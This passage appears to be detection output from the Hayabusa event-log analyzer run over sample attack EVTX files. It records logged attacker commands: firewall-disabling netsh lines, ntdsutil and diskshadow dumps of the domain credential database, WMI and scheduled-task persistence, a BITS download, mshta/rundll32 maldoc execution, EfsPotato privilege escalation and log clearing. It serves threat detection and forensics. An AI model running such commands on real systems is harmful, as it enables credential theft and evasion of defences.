Disabled,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_windows_firewall_profile_disabled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID800-4103-Firewall disabled.evtx 2021-06-04 03:34:12.887 +09:00,fs01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-NetFirewallProfile): ""Set-NetFirewallProfile"" ParameterBinding(Set-NetFirewallProfile): name=""Name""; value=""Domain, Public, Private"" ParameterBinding(Set-NetFirewallProfile): name=""Enabled""; value=""False"" ParameterBinding(Set-NetFirewallProfile): name=""All""; value=""False"" ParameterBinding(Set-NetFirewallProfile): name=""PolicyStore""; value="""" ParameterBinding(Set-NetFirewallProfile): name=""GPOSession""; value="""" ParameterBinding(Set-NetFirewallProfile): name=""LogFileName""; value="""" ParameterBinding(Set-NetFirewallProfile): name=""LogMaxSizeKilobytes""; value=""0"" ParameterBinding(Set-NetFirewallProfile): name=""ThrottleLimit""; value=""0"" ParameterBinding(Set-NetFirewallProfile): name=""AsJob""; value=""False"" ParameterBinding(Set-NetFirewallProfile): name=""PassThru""; value=""False""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID800-4103-Firewall disabled.evtx 2021-06-04 03:34:12.888 +09:00,fs01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID800-4103-Firewall disabled.evtx 2021-06-04 03:34:12.889 +09:00,fs01.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID800-4103-Firewall disabled.evtx 2021-06-04 03:34:12.895 +09:00,fs01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID800-4103-Firewall disabled.evtx 2021-06-04 04:17:44.873 +09:00,fs01.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4688-5447-4950-Firewall disabled (command).evtx 2021-06-04 04:17:46.489 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: netsh a s p state off | Path: C:\Windows\System32\netsh.exe | PID: 0xfa8 | User: admmig | LID: 0x46b7b4,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4688-5447-4950-Firewall disabled (command).evtx 2021-06-04 04:17:46.577 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: netsh advfirewall set privateprofile state off | Path: C:\Windows\System32\netsh.exe | PID: 0x10fc | User: admmig | LID: 0x46b7b4,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4688-5447-4950-Firewall disabled (command).evtx 2021-06-04 04:17:46.666 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: netsh f s o d | Path: C:\Windows\System32\netsh.exe | PID: 0x1598 | User: admmig | LID: 0x46b7b4,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4688-5447-4950-Firewall disabled (command).evtx 2021-06-04 04:17:47.699 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: netsh firewall set opmode disable | Path: C:\Windows\System32\netsh.exe | PID: 0x1504 | User: admmig | LID: 0x46b7b4,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4688-5447-4950-Firewall disabled (command).evtx 2021-06-04 04:39:52.893 +09:00,fs01.offsec.lan,2003,low,,Setting Change in Windows Firewall with Advanced Security,,../hayabusa-rules/sigma/builtin/firewall_as/win_firewall_as_setting_change.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID2003-4950-Firewall disabled.evtx 2021-06-04 04:39:52.895 +09:00,fs01.offsec.lan,2003,low,,Setting Change in Windows Firewall with Advanced Security,,../hayabusa-rules/sigma/builtin/firewall_as/win_firewall_as_setting_change.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID2003-4950-Firewall disabled.evtx 2021-06-04 04:39:53.056 +09:00,fs01.offsec.lan,2003,low,,Setting Change in Windows Firewall with Advanced Security,,../hayabusa-rules/sigma/builtin/firewall_as/win_firewall_as_setting_change.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID2003-4950-Firewall disabled.evtx 2021-06-04 17:41:47.982 +09:00,exchange01.offsec.lan,6,high,Persis,Failed MSExchange Transport Agent Installation,,../hayabusa-rules/sigma/builtin/msexchange/win_exchange_transportagent_failed.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1505-Server Software Component/ID6-Failed to install an Exchange transport agent.evtx 2021-06-04 17:41:48.041 +09:00,exchange01.offsec.lan,6,high,Persis,Failed MSExchange Transport Agent Installation,,../hayabusa-rules/sigma/builtin/msexchange/win_exchange_transportagent_failed.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1505-Server Software Component/ID6-Failed to install an Exchange transport agent.evtx 2021-06-04 18:30:48.170 +09:00,exchange01.offsec.lan,11,info,,File Created,Path: E:\Exchange2016\TransportRoles\Shared\agents.config | Process: C:\Program Files (x86)\Notepad++\notepad++.exe | PID: 19108 | PGUID: 6D3C60FE-F13D-60B9-22E2-010000001D00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1505-Server Software Component/ID11-Exchange transport config modified.evtx 2021-06-06 04:35:16.721 +09:00,rootdc1.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\hacker' q q | Path: C:\Windows\System32\ntdsutil.exe | PID: 0x724 | User: admmig | LID: 0xa8a1627a,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-IFM created.evtx 2021-06-06 04:36:32.683 +09:00,rootdc1.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ntdsutil ""activate instance ntds"" ifm ""create full c:\hacker"" quit quit | Path: C:\Windows\System32\ntdsutil.exe | PID: 0x1bec | User: admmig | LID: 0xa8a1627a",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-IFM created.evtx 2021-06-06 05:17:05.433 +09:00,rootdc1.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: diskshadow.exe /s shadow.txt | Path: C:\Windows\System32\diskshadow.exe | PID: 0xda8 | User: admmig | LID: 0xa8a1627a,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-Diskshadow abuse.evtx 2021-06-10 04:29:58.239 +09:00,fs01.offsec.lan,20,medium,,WMI Event Consumer Activity,"technique_id=T1047,technique_name=Windows Management Instrumentation | Created | Type: Command Line | Name: ""Evil"" | Dst: ""cmd.exe /c echo %ProcessId% >> c:\\\\temp\\\\log.txt"" | User: OFFSEC\admmig",../hayabusa-rules/hayabusa/sysmon/alerts/20_WmiEventConsumerActivity_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID19-20-WMI registration via PowerLurk.evtx 2021-06-10 04:29:58.240 +09:00,fs01.offsec.lan,19,medium,,WMI Event Filter Activity_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | Created | Namespace: ""root/cimv2"" | Name: ""Evil"" | Query: ""SELECT * FROM Win32_ProcessStartTrace WHERE ProcessName='notepad.exe'"" | User: OFFSEC\admmig",../hayabusa-rules/hayabusa/sysmon/alerts/19_WmiEventFilterActivity_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID19-20-WMI registration via PowerLurk.evtx 2021-06-10 04:29:58.392 +09:00,fs01.offsec.lan,19,medium,,WMI Event Filter Activity_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | Created | Namespace: ""root/cimv2"" | Name: ""Evil"" | Query: ""SELECT * FROM Win32_ProcessStartTrace WHERE ProcessName='notepad.exe'"" | User: OFFSEC\admmig",../hayabusa-rules/hayabusa/sysmon/alerts/19_WmiEventFilterActivity_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID19-20-WMI registration via PowerLurk.evtx 2021-06-10 23:12:46.042 +09:00,fs01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadline): ""PSConsoleHostReadline""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID800-4103-4104-WMI registration via PowerLurk.evtx 2021-06-10 23:12:46.058 +09:00,fs01.offsec.lan,4104,info,,PwSh Scriptblock Log,"c:\\temp\\log.txt"" -Trigger ProcessStart -ProcessName notepad.exe",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID800-4103-4104-WMI registration via PowerLurk.evtx 2021-06-10 23:12:46.157 +09:00,fs01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-WmiInstance): ""Set-WmiInstance"" ParameterBinding(Set-WmiInstance): name=""Namespace""; value=""root/subscription"" ParameterBinding(Set-WmiInstance): name=""Class""; value=""CommandLineEventConsumer"" ParameterBinding(Set-WmiInstance): name=""Arguments""; value=""System.Collections.Hashtable""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID800-4103-4104-WMI registration via PowerLurk.evtx 2021-06-10 23:12:46.177 +09:00,fs01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-WmiInstance): ""Set-WmiInstance"" ParameterBinding(Set-WmiInstance): name=""Namespace""; value=""root/subscription"" ParameterBinding(Set-WmiInstance): name=""Class""; value=""__EventFilter"" ParameterBinding(Set-WmiInstance): name=""Arguments""; value=""System.Collections.Hashtable""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID800-4103-4104-WMI registration via PowerLurk.evtx 2021-06-11 06:21:20.636 +09:00,fs01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x5a4175e,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx" 2021-06-11 06:21:26.357 +09:00,fs01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x5a41984,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx" 2021-06-11 06:21:26.357 +09:00,fs01.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx" 2021-06-11 06:21:26.383 +09:00,fs01.offsec.lan,4698,info,,Task Created,"Name: \bouWFQYO | Content: 2015-07-15T20:35:13.2757294 true 1 S-1-5-18 HighestAvailable InteractiveToken IgnoreNew false false true false true false true true true false false P3D 7 cmd.exe /C whoami > %windir%\Temp\bouWFQYO.tmp 2>&1 \bouWFQYO | User: admmig | LID: 0x5a419bc",../hayabusa-rules/hayabusa/non-default/events/Security/ScheduledTasks/4698_ScheduledTaskCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4698-4699-Fast created & deleted task by ATexec (susp. arg.).evtx 2021-06-11 06:21:26.383 +09:00,fs01.offsec.lan,4698,info,,Task Created,"Name: \bouWFQYO | Content: 2015-07-15T20:35:13.2757294 true 1 S-1-5-18 HighestAvailable InteractiveToken IgnoreNew false false true false true false true true true false false P3D 7 cmd.exe /C whoami > %windir%\Temp\bouWFQYO.tmp 2>&1 \bouWFQYO | User: admmig | LID: 0x5a419bc",../hayabusa-rules/hayabusa/non-default/events/Security/ScheduledTasks/4698_ScheduledTaskCreated.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx" 2021-06-11 06:21:26.390 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd.exe /C whoami > C:\Windows\Temp\bouWFQYO.tmp 2>&1 | Path: C:\Windows\System32\cmd.exe | PID: 0x3d0 | User: FS01$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx" 2021-06-11 06:21:26.406 +09:00,fs01.offsec.lan,4699,info,,Task Deleted,Name: \bouWFQYO | User: admmig | LID: 0x5a419bc,../hayabusa-rules/hayabusa/non-default/events/Security/ScheduledTasks/4699_ScheduledTaskDeleted.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4698-4699-Fast created & deleted task by ATexec (susp. arg.).evtx 2021-06-11 06:21:26.406 +09:00,fs01.offsec.lan,4699,medium,Exec | PrivEsc,Scheduled Task Deletion,,../hayabusa-rules/sigma/builtin/security/win_scheduled_task_deletion.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4698-4699-Fast created & deleted task by ATexec (susp. arg.).evtx 2021-06-11 06:21:26.406 +09:00,fs01.offsec.lan,4699,info,,Task Deleted,Name: \bouWFQYO | User: admmig | LID: 0x5a419bc,../hayabusa-rules/hayabusa/non-default/events/Security/ScheduledTasks/4699_ScheduledTaskDeleted.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx" 2021-06-11 06:21:26.406 +09:00,fs01.offsec.lan,4699,medium,Exec | PrivEsc,Scheduled Task Deletion,,../hayabusa-rules/sigma/builtin/security/win_scheduled_task_deletion.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx" 2021-06-11 06:21:26.415 +09:00,fs01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: Temp\bouWFQYO.tmp | IP Addr: 10.23.123.11 | LID: 0x5a41984,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID5145-Remote schedule task creation (ATexec).evtx 2021-06-11 06:21:26.415 +09:00,fs01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: Temp\bouWFQYO.tmp | IP Addr: 10.23.123.11 | LID: 0x5a41984,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx" 2021-06-11 06:21:29.427 +09:00,fs01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: Temp\bouWFQYO.tmp | IP Addr: 10.23.123.11 | LID: 0x5a41984,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID5145-Remote schedule task creation (ATexec).evtx 2021-06-11 06:21:29.427 +09:00,fs01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: Temp\bouWFQYO.tmp | IP Addr: 10.23.123.11 | LID: 0x5a41984,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx" 2021-06-11 06:21:29.441 +09:00,fs01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: Temp\bouWFQYO.tmp | IP Addr: 10.23.123.11 | LID: 0x5a41984,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID5145-Remote schedule task creation (ATexec).evtx 2021-06-11 06:21:29.441 +09:00,fs01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: Temp\bouWFQYO.tmp | IP Addr: 10.23.123.11 | LID: 0x5a41984,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx" 2021-06-13 15:17:18.087 +09:00,sv-dc.hinokabegakure-no-sato.local,59,info,Evas | Persis,Bits Job Created,Job Title: test | URL: http://192.168.10.254:80/calc.exe,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/YamatoSecurity/T1197_BITS Jobs/Windows-BitsClient.evtx 2021-08-08 08:32:57.348 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Program Files\Microsoft Office\Office14\WINWORD.EXE"" /n ""C:\Users\IEUser\Desktop\stats.doc"" | Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x7a857 | PID: 3424 | PGUID: 747F3D96-1829-610F-0000-0010A33FD200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/maldoc_mshta_via_shellbrowserwind_rundll32.evtx 2021-08-08 08:33:01.103 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\SysWOW64\mshta.exe"" ""C:\Users\Public\memViewData.hta"" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} | Process: C:\Windows\SysWOW64\mshta.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x7a857 | PID: 9932 | PGUID: 747F3D96-182D-610F-0000-00106F40D300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/maldoc_mshta_via_shellbrowserwind_rundll32.evtx 2021-08-08 08:33:01.103 +09:00,MSEDGEWIN10,1,high,Evas | Exec,MSHTA Suspicious Execution 01,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/maldoc_mshta_via_shellbrowserwind_rundll32.evtx 2021-08-08 08:33:01.103 +09:00,MSEDGEWIN10,1,high,Exec,Suspicious MSHTA Process Patterns,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/maldoc_mshta_via_shellbrowserwind_rundll32.evtx 2021-08-08 08:33:01.176 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: ? | LID: 0x3e5 | PID: 11196 | PGUID: 747F3D96-182D-610F-0000-00100344D300,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/maldoc_mshta_via_shellbrowserwind_rundll32.evtx 2021-08-08 08:33:01.176 +09:00,MSEDGEWIN10,1,low,Evas,Windows Processes Suspicious Parent Directory,,../hayabusa-rules/sigma/process_creation/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/maldoc_mshta_via_shellbrowserwind_rundll32.evtx 2021-08-08 08:33:01.176 +09:00,MSEDGEWIN10,1,high,Evas,Suspicious Svchost Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/maldoc_mshta_via_shellbrowserwind_rundll32.evtx 2021-08-08 08:33:08.346 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\rundll32.exe"" c:\users\public\memViewData.jpg,PluginInit | Process: C:\Windows\SysWOW64\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\SysWOW64\mshta.exe"" ""C:\Users\Public\memViewData.hta"" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} | LID: 0x7a857 | PID: 6576 | PGUID: 747F3D96-1834-610F-0000-00105FE5D300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/maldoc_mshta_via_shellbrowserwind_rundll32.evtx 2021-08-08 08:33:08.346 +09:00,MSEDGEWIN10,1,high,,Application Executed Non-Executable Extension,,../hayabusa-rules/sigma/process_creation/proc_creation_win_run_executable_invalid_extension.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/maldoc_mshta_via_shellbrowserwind_rundll32.evtx 2021-08-08 08:33:15.303 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM \system32\AppHostRegistrationVerifier.exe | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ? | LID: 0x7a857 | PID: 11324 | PGUID: 747F3D96-183B-610F-0000-0010DC6CD400,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/maldoc_mshta_via_shellbrowserwind_rundll32.evtx 2021-08-08 08:33:15.303 +09:00,MSEDGEWIN10,1,low,Disc,Local Accounts Discovery,,../hayabusa-rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/maldoc_mshta_via_shellbrowserwind_rundll32.evtx 2021-08-17 21:26:51.403 +09:00,LAPTOP-JU4M3I0E,16,medium,Evas,Sysmon Configuration Change,,../hayabusa-rules/sigma/sysmon/sysmon_config_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx 2021-08-17 21:26:51.457 +09:00,LAPTOP-JU4M3I0E,16,medium,Evas,Sysmon Configuration Change,,../hayabusa-rules/sigma/sysmon/sysmon_config_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx 2021-08-23 04:33:38.725 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: c:\temp\EfsPotato.exe whoami | Process: C:\temp\EfsPotato.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: ""cmd.exe"" | LID: 0x3e4 | PID: 14048 | PGUID: 00247C92-A691-6122-0000-001021C31F02",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx 2021-08-23 04:33:38.725 +09:00,LAPTOP-JU4M3I0E,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx 2021-08-23 04:33:38.844 +09:00,LAPTOP-JU4M3I0E,17,info,,Pipe Created,\dd4c18dc-bff6-42ce-b707-62c114b84291\pipe\srvsvc | Process: c:\temp\EfsPotato.exe | PID: 14048 | PGUID: 00247C92-A691-6122-0000-001021C31F02,../hayabusa-rules/hayabusa/sysmon/events/17_PipeCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx 2021-08-23 04:33:38.844 +09:00,LAPTOP-JU4M3I0E,17,critical,Evas | PrivEsc,EfsPotato Named Pipe,,../hayabusa-rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx 2021-08-23 04:33:38.881 +09:00,LAPTOP-JU4M3I0E,18,info,,Pipe Connected,\lsass | Process: System | PID: 4 | PGUID: 00247C92-707C-6122-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx 2021-08-23 04:33:38.884 +09:00,LAPTOP-JU4M3I0E,18,info,,Pipe Connected,\dd4c18dc-bff6-42ce-b707-62c114b84291\pipe\srvsvc | Process: System | PID: 4 | 